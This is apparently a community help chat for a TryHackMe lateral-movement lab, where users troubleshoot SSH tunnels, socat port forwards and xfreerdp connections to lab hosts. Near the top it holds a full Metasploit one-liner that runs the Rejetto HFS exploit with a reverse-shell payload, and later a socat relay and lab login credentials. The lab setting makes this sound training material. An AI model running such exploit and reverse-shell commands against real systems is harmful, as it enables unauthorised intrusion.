sudo msfconsole -x "use exploit/windows/http/rejetto_hfs_exec ; set PAYLOAD windows/shell_reverse_tcp ; set LHOST THMJMP2.za.tryhackme.com ; set ReverseListenerBindAddress 127.0.0.1 ; set LPORT 7878 ; set srvhost 127.0.0.1 ; set srvport 7676 ; set RHOST 127.0.0.1 ; set RPORT 80 ; run"

i perform all those cmd on AttackBox as well as on my own machine, same outcome !

Please help 🙏😊

I think your SSH tunnel is pointing to THMIIS instead of THMDC

rejetto is on THMDC 🙂

Hi munra, you're absolutly right you !!! i'll redo again and see if it works !
thanks

Gave +1 Rep to @shadow linden

@shadow linden I am trying to reach THMIIS from JMPHOST but it doesn't work
I think its bugged or something

Iam in task 3

I tried to use meterpreter service reverse shell and psexec but not working, cannot reach it

@rose kernel

Guys, do you know why i get this error with xfreerdp?
connected to THMJMP2.za.tryhackme.com:4578
SSL_read: I/O error: Success (0)

Let me do a quick check

RDP is working for me. I'm not sure about your error message, but it would seem you are trying to connect to port 4578? If you send a screenshot with the entire output, I might be able to give a better answer 🙂

ping is disabled in THMIIS, so that may be your problem. It won't work by design. If you want to check if THMIIS is up and reachable, just try doing a ping from THMJMP2 and then immediately run arp -a. If you see a physical address associated to THMIIS's IP, then it is up and reachable.

for the specifics of your problem with psexec, I need more info on what may be failing

if you want to send screenshots, you can do so after verifying your account btw 🙂

!docs verify

Yes, I just tried to connect a forwarded port :

root@test~# xfreerdp /v:THMJMP2.za.tryhackme.com:4549 /u:danny.goddard /p:imple56
connected to THMJMP2.za.tryhackme.com:4549
SSL_read: I/O error: Success (0)`

I can't put a screenshot here

I forwarded the port with socat :
za\danny.goddard@THMJMP2 C:\Users\danny.goddard>socat.exe TCP4-LISTEN:4549,fork TCP4:THMIIS.za.tryhackme.com:3389

it's really weird

idk why

i would like to ask chatgtp but it is down 🤨